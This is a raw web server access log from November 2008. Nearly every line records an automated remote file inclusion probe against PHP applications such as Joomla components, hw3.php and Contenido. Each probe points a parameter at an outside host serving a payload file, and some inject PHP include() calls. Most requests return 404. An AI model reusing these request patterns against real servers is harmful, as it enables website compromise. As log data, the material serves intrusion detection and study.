193.51.8.19 - - [19/Nov/2008:04:36:31 -0800] "GET /logs/access_080920.log/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
193.51.8.19 - - [19/Nov/2008:04:36:31 -0800] "GET /logs/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
193.51.8.19 - - [19/Nov/2008:04:36:35 -0800] "GET /logs/access_080922.log/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
193.51.8.19 - - [19/Nov/2008:04:36:36 -0800] "GET /logs/access_080922.log/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
74.7.219.93 - - [19/Nov/2008:04:36:49 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nysracc.com"
203.86.233.109 - - [19/Nov/2008:04:37:14 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nysracc.com"
203.86.233.109 - - [19/Nov/2008:04:37:14 -0800] "GET /logs/access.log%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nysracc.com"
203.86.233.109 - - [19/Nov/2008:04:37:14 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nysracc.com"
72.232.184.234 - - [19/Nov/2008:04:37:16 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geocities.com/blade_tea/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
72.232.184.234 - - [19/Nov/2008:04:37:16 -0800] "GET /logs/access.log%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geocities.com/blade_tea/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
72.232.184.234 - - [19/Nov/2008:04:37:16 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://geocities.com/blade_tea/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nysracc.com"
24.67.0.44 - - [19/Nov/2008:04:37:23 -0800] "GET /?_zb_path=http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 200 779 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.nyassemblygop.org"
24.67.0.44 - - [19/Nov/2008:04:37:23 -0800] "GET /logs//?_zb_path=http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 200 3946 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:37:27 -0800] "GET /logs/language=0&lang_settings[0][1]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:37:27 -0800] "GET /logs/language=0&lang_settings[0][1]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:37:27 -0800] "GET /language=0&lang_settings[0][1]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
89.149.254.185 - - [19/Nov/2008:04:37:27 -0800] "GET /language=0&lang_settings[0][1]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.nyassemblygop.org"
190.24.168.93 - - [19/Nov/2008:04:39:16 -0800] "GET /logs/access_080920.log/language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
190.24.168.93 - - [19/Nov/2008:04:39:16 -0800] "GET /language=0&lang_settings[0][1]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
121.78.225.23 - - [19/Nov/2008:04:39:28 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.nysracc.com"
74.7.219.93 - - [19/Nov/2008:04:39:32 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
74.7.219.93 - - [19/Nov/2008:04:39:32 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
195.182.135.178 - - [19/Nov/2008:04:40:15 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nysracc.com"
195.182.135.178 - - [19/Nov/2008:04:40:15 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nysracc.com"
195.182.135.178 - - [19/Nov/2008:04:40:15 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nysracc.com"
195.182.135.178 - - [19/Nov/2008:04:40:33 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.nysracc.com"
195.182.135.178 - - [19/Nov/2008:04:40:33 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.nysracc.com"
195.182.135.178 - - [19/Nov/2008:04:40:33 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.nysracc.com"
195.182.135.178 - - [19/Nov/2008:04:40:36 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nyassemblygop.org"
195.182.135.178 - - [19/Nov/2008:04:40:36 -0800] "GET /logs/access_080922.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nyassemblygop.org"
195.182.135.178 - - [19/Nov/2008:04:40:36 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nyassemblygop.org"
195.182.135.178 - - [19/Nov/2008:04:40:51 -0800] "GET /logs/access_080922.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.nyassemblygop.org"
195.182.135.178 - - [19/Nov/2008:04:40:51 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.nyassemblygop.org"
195.182.135.178 - - [19/Nov/2008:04:40:51 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.nyassemblygop.org"
195.182.135.178 - - [19/Nov/2008:04:40:53 -0800] "GET /logs/access_080923.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nyassemblygop.org"
121.78.225.23 - - [19/Nov/2008:04:40:54 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.nyassemblygop.org"
121.78.225.23 - - [19/Nov/2008:04:40:55 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.nyassemblygop.org"
121.78.225.23 - - [19/Nov/2008:04:40:55 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.nyassemblygop.org"
208.83.106.201 - - [19/Nov/2008:04:41:18 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.nyassemblygop.org"
208.83.106.201 - - [19/Nov/2008:04:41:18 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.nyassemblygop.org"
195.182.135.178 - - [19/Nov/2008:04:41:27 -0800] "GET /logs/access_080923.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.nyassemblygop.org"
218.234.23.56 - - [19/Nov/2008:04:42:46 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
218.234.23.56 - - [19/Nov/2008:04:42:47 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
218.234.23.56 - - [19/Nov/2008:04:42:48 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nysracc.com"
218.234.23.56 - - [19/Nov/2008:04:42:53 -0800] "GET /logs/access_080911.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
218.234.23.56 - - [19/Nov/2008:04:42:54 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
218.234.23.56 - - [19/Nov/2008:04:42:54 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:43:23 -0800] "GET /logs/access_081021.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:43:24 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:43:24 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:43:29 -0800] "GET /logs/access_081021.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:43:29 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:43:30 -0800] "GET /logs/access_081021.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:43:30 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:43:30 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:43:30 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
203.86.233.109 - - [19/Nov/2008:04:43:46 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nysracc.com"
203.86.233.109 - - [19/Nov/2008:04:44:01 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
203.86.233.109 - - [19/Nov/2008:04:44:01 -0800] "GET /logs/access_080922.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
203.86.233.109 - - [19/Nov/2008:04:44:03 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.nysracc.com"
203.86.233.109 - - [19/Nov/2008:04:44:03 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.nysracc.com"
203.86.233.109 - - [19/Nov/2008:04:44:03 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.nysracc.com"
195.182.135.178 - - [19/Nov/2008:04:44:03 -0800] "GET /logs/access_081002.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nyassemblygop.org"
195.182.135.178 - - [19/Nov/2008:04:44:04 -0800] "GET /logs/access_081009.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.nyassemblygop.org"
89.108.64.188 - - [19/Nov/2008:04:44:05 -0800] "GET /logs/access.log/index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nyassemblygop.org"
89.108.64.188 - - [19/Nov/2008:04:44:07 -0800] "GET /index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nyassemblygop.org"
89.108.64.188 - - [19/Nov/2008:04:44:07 -0800] "GET /logs/access.log/index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nyassemblygop.org"
89.108.64.188 - - [19/Nov/2008:04:44:07 -0800] "GET /logs/index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nyassemblygop.org"
89.108.64.188 - - [19/Nov/2008:04:44:11 -0800] "GET /index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:44:15 -0800] "GET /logs/access_081021.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
203.86.233.109 - - [19/Nov/2008:04:44:15 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:44:16 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
211.234.110.170 - - [19/Nov/2008:04:44:16 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://svitkomfortu.ua//administrator/components/com_chronocontact/excelwriter/Writer/idbl.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.nyassemblygop.org"
195.182.135.178 - - [19/Nov/2008:04:44:35 -0800] "GET /logs/access_081002.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.nyassemblygop.org"
195.182.135.178 - - [19/Nov/2008:04:44:39 -0800] "GET /logs/access_081009.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.nyassemblygop.org"
203.86.233.109 - - [19/Nov/2008:04:45:05 -0800] "GET /logs/access_080923.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:04:45:46 -0800] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%bItemd%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:04:45:46 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%bItemd%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:04:45:46 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%bItemd%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:04:45:55 -0800] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%bItemd%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:04:45:55 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%bItemd%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
70.85.149.242 - - [19/Nov/2008:04:45:55 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%bItemd%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.nyassemblygop.org"
89.108.64.188 - - [19/Nov/2008:04:46:10 -0800] "GET /logs/access.log/index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nysracc.com"
89.108.64.188 - - [19/Nov/2008:04:46:11 -0800] "GET /index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nysracc.com"
89.108.64.188 - - [19/Nov/2008:04:46:11 -0800] "GET /logs/index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nysracc.com"
89.108.64.188 - - [19/Nov/2008:04:46:14 -0800] "GET /logs/access.log/index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nysracc.com"
89.108.64.188 - - [19/Nov/2008:04:46:14 -0800] "GET /index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nysracc.com"
89.108.64.188 - - [19/Nov/2008:04:46:15 -0800] "GET /logs/index.php?redir=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.nysracc.com"
219.85.63.226 - - [19/Nov/2008:04:46:29 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.nysracc.com"
219.85.63.226 - - [19/Nov/2008:04:46:29 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.nysracc.com"
219.85.63.226 - - [19/Nov/2008:04:46:29 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://pgeh.hs.kr/~meca/zb41pl4/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.nysracc.com"
